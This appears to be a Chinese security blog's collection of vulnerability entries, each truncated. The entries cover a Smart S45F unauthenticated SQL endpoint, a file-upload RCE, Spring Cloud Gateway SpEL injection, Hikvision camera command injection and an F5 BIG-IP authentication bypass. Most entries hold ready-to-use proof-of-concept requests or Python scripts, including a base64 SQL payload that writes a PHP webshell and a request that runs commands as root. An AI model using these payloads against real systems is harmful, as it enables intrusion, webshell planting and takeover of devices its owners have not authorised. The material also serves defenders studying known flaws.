原理SQL语句执行接口未授权访问,可执行任意SQL语句。影响范围Smart S45F危害远程攻击者可利用该漏洞执行任意SQL语句,包括写入webshell。POC & EXP手工漏洞位置:https://ip:port/importexport.php该接口可以使用GET参数执行SQL语句参数sql=base64编码的SQL语句 参数type=exportexcelbysql,执行动作 POC:1https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql base64: select 0x3c3f706870206563686f2073797374656d28245f504f53545b2263
原理文件上传点存在一个白名单,在白名单之外的内容会被添加后缀并base64编码文件内容,编码后的文件会获得一个id,通过webmain/task/runt/qcloudCosAction.php中的qcloudCosAction类的run方法,提供对应的id即可复原后缀和内容,从而导致上传的文件被解析。危害攻击者可获得系统的完整访问权限。POC & EXPimport requests session = requests.session() url_pre = 'http://x.x.x.x/' url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953' url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' url3 = url_pre + '/task.php?m=qcloudCos|runt&a=
原理启用和暴露Gateway Actuator端点时,可用恶意的SpEL表达式被嵌入路由路径,在刷新路由时导致RCE。参考文章:https://blog.csdn.net/m0_61506558/article/details/126914956影响范围Spring Cloud Gateway < 3.1.1Spring Cloud Gateway < 3.1.7Spring Cloud Gateway 2.x危害远程攻击者可利用该漏洞可以发出恶意的请求,允许在远程主机上执行任意远程命令。POC & EXP手工# 1. 请求http://x.x.x.x:x/actuator,确认端口开启 # 2. 新建一个路由,注入恶意的SpELl表达式,返回状态码应为201 Created POST /actuator/gateway/routes/test HTTP/1.1 Host: x.x.x.x:x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
原理由于摄像头对传入的字符串未做进一步确认,导致恶意的命令被注入到正常命令中。参考文章:https://kms.app/archives/399/影响范围DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build
原理在同时设置HTTP基础认证与X-F5-Auth-Token头且值为空时,会绕过程序对身份的验证,通过特定的接口即可进行远程命令执行。影响范围危害可以获取root权限,并以root权限执行命令。POC & EXP手工POST /mgmt/tm/util/bash HTTP/1.1 Host: 192.168.59.7 Content-Type: application/json X-F5-Auth-Token: Authorization: Basic YWRtaW46 Content-Length: 52 { "command": "run", "utilCmdArgs": "-c id" }脚本import requests import json import sys requests.packages.urllib3.disable_warnings() proxies = {'http': 'http://localhost:7890', 'https': 'http://l
Equinox
一个乐于分享的网安人